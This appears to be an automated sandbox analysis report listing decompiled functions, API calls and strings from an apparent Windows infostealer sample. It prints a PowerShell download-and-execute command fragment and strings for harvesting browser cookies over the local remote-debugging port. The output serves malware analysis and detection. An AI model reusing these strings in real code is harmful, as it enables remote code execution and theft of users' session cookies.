                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: 879740a29a12d0888bf00901d902eceb035c01390d8910639e0fa56422396509
                          • Instruction ID: 2ac57b49f7bc123800e51197bec7bbe4e32d2dbb50f64a2a6b89c3b618018786
                          • Opcode Fuzzy Hash: 879740a29a12d0888bf00901d902eceb035c01390d8910639e0fa56422396509
                          • Instruction Fuzzy Hash: 01B17071A25616EBCB21EF6CDC4DAAFB3B5AF00300F044524B815A72D2DB78DD45DB91
                          Function 007247E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,007172A4), ref: 007247E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 007247FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0072480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0072481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 0072482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00724840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 00724851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 00724862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00724873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00724884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 00724895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: 4bd402597075f028846811c4df9272fd33a7cc97bb2290bc02832c8945d065c0
                          • Instruction ID: d8baa461fddd24e46b7c11d5ae1ac41c4a6df4afa3eaba45b6f8d2c85faf781c
                          • Opcode Fuzzy Hash: 4bd402597075f028846811c4df9272fd33a7cc97bb2290bc02832c8945d065c0
                          • Instruction Fuzzy Hash: 5211DBB697A724AFD724EFB5AD0DB573AB8BB0A70A704081AF151D2161DBF84400FF90
                          Function 0071BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071BE53
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071BE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0071BE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071BEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0071BEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071BEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0071BEEB
                          • lstrlen.KERNEL32(')"), ref: 0071BEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071BF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 0071BF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071BF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0071BF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071BF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0071BF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071BFBA
                          • ShellExecuteEx.SHELL32(?), ref: 0071C00C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: d9065632f286d9c398a21329f56c7fa1d5734dd6a3720f1e4ff24e169795fb07
                          • Instruction ID: f60f3fb93a2cc40de02c00cf37f5a8b10b777c509e3d7c946b563c43b886dc5a
                          • Opcode Fuzzy Hash: d9065632f286d9c398a21329f56c7fa1d5734dd6a3720f1e4ff24e169795fb07
                          • Instruction Fuzzy Hash: 9C619672A24255DBCB11AFBDDC8D69E7BE9AF04300F044525F805E3292DB3CD9468F91
                          Function 00721820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0072184F
                          • lstrlen.KERNEL32(010C6148), ref: 00721860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007218C1
                          • lstrlen.KERNEL32(00734FA0), ref: 007218D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007218F4
                          • lstrcat.KERNEL32(00000000,00734FA0), ref: 00721900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0072192F
                          • lstrlen.KERNEL32(010C6008), ref: 00721945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0072196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007219A6
                          • lstrlen.KERNEL32(00734FA0), ref: 007219B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007219D9
                          • lstrcat.KERNEL32(00000000,00734FA0), ref: 007219E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721A14
                          • lstrlen.KERNEL32(010C6018), ref: 00721A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721A8B
                          • lstrlen.KERNEL32(010C6038), ref: 00721AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00721AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00721B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: 7bc15fbb60763f243ba0ee0fbababdd35f3b0f2ffbbdd1a2dc02cdc63f6504dd
                          • Instruction ID: 4bcb22ee685a984632bf4585fb02880a597b94b3d58444f1685c8f0a622fd808
                          • Opcode Fuzzy Hash: 7bc15fbb60763f243ba0ee0fbababdd35f3b0f2ffbbdd1a2dc02cdc63f6504dd
                          • Instruction Fuzzy Hash: 9D912EB1615713DBDB209FB9EC8CA17B7F8BF24300B548528B886D3292DB78E845DB50
                          Function 00714760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 007147C5
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00714812
                          • lstrlen.KERNEL32(00734B60), ref: 0071481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071483A
                          • lstrcat.KERNEL32(00000000,00734B60), ref: 00714846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007148A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007148CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 007148DC
                          • lstrlen.KERNEL32(?), ref: 007148F0
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00714931
                          • lstrcpy.KERNEL32(00000000,?), ref: 007149B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 007149E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 00714A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: 5c195d52ba2dc7a317bfa6b08d1b4ef85004efad35a82f1d8180f123ef47be18
                          • Instruction ID: 8a6cbdefc430d10076000c75588ea4d1f52c304bd950d893628f6e1747704950
                          • Opcode Fuzzy Hash: 5c195d52ba2dc7a317bfa6b08d1b4ef85004efad35a82f1d8180f123ef47be18
                          • Instruction Fuzzy Hash: 28B17172A15206DBCB21EF7CD98DA9E77F5AF44700F058528FC45A7292DB38EC468B90
                          Function 007092B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 007090C0: InternetOpenA.WININET(0072CFEC,00000001,00000000,00000000,00000000), ref: 007090DF
                            • Part of subcall function 007090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007090FC
                            • Part of subcall function 007090C0: InternetCloseHandle.WININET(00000000), ref: 00709109
                          • strlen.MSVCRT ref: 007092E1
                          • strlen.MSVCRT ref: 007092FA
                            • Part of subcall function 00708980: std::_Xinvalid_argument.LIBCPMT ref: 00708996
                          • strlen.MSVCRT ref: 00709399
                          • strlen.MSVCRT ref: 007093E6
                          • lstrcat.KERNEL32(?,cookies), ref: 00709547
                          • lstrcat.KERNEL32(?,00731794), ref: 00709559
                          • lstrcat.KERNEL32(?,?), ref: 0070956A
                          • lstrcat.KERNEL32(?,00734B98), ref: 0070957C
                          • lstrcat.KERNEL32(?,?), ref: 0070958D
                          • lstrcat.KERNEL32(?,.txt), ref: 0070959F
                          • lstrlen.KERNEL32(?), ref: 007095B6
                          • lstrlen.KERNEL32(?), ref: 007095DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 00709614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: 50b0175edda8ffa5331fb86de10e0c1f61fa0a051bd9bd14b94f0d7402daf2d0
                          • Instruction ID: dbda4f0a8e2c0a9221756882cac632a467172f5c2e5184662f8fd724b8b04402
                          • Opcode Fuzzy Hash: 50b0175edda8ffa5331fb86de10e0c1f61fa0a051bd9bd14b94f0d7402daf2d0
                          • Instruction Fuzzy Hash: 19E11BB1E10218DBDF14DFA8D884ADEBBF5BF48300F108569E509A7282EB799E45CF51
                          Function 0071D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0071D9A1
                          • memset.MSVCRT ref: 0071D9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071D9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071DA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 0071DA1C
                          • lstrcat.KERNEL32(?,010DD930), ref: 0071DA36
                          • lstrcat.KERNEL32(?,?), ref: 0071DA4A
                          • lstrcat.KERNEL32(?,010DCCB0), ref: 0071DA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071DA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0071DA95
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071DAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: 5cf3db6a9a47e8ef9b32765c73aaacee6ee48fa0d22bcc3f6562f58bdac1d22d
                          • Instruction ID: 976c8be03c71c4005205029597e59001ca53f01b705b5fcef570e98da7ed9000
                          • Opcode Fuzzy Hash: 5cf3db6a9a47e8ef9b32765c73aaacee6ee48fa0d22bcc3f6562f58bdac1d22d
                          • Instruction Fuzzy Hash: 8FB193B2914259DFDB20EF68DC889EE77B9AF48300F048564F905A7291DA789E45CF90
                          Function 0070B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070B330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070B3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B3D9
                          • lstrlen.KERNEL32(00734C50), ref: 0070B450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B474
                          • lstrcat.KERNEL32(00000000,00734C50), ref: 0070B480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B4A9
                          • lstrlen.KERNEL32(00000000), ref: 0070B52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070B55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B587
                          • lstrlen.KERNEL32(00734AD4), ref: 0070B5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B622
                          • lstrcat.KERNEL32(00000000,00734AD4), ref: 0070B62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B65E
                          • lstrlen.KERNEL32(?), ref: 0070B767
                          • lstrlen.KERNEL32(?), ref: 0070B776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070B79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: df81b7928afb033244a5d3eaf109c863d08e3da2b0e902d2f31475eb23f34208
                          • Instruction ID: cb5f4f9ba9e7e005f9adb98a30790df5e67cd6be0f95cc82988bb2e2a68edbed
                          • Opcode Fuzzy Hash: df81b7928afb033244a5d3eaf109c863d08e3da2b0e902d2f31475eb23f34208
                          • Instruction Fuzzy Hash: 89024171A15205CFCB25DF68D988B6AB7F1AF44304F188269E805AB3A2D779DD42DF80
                          Function 00723760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                          Download Yara Rule
                          APIs
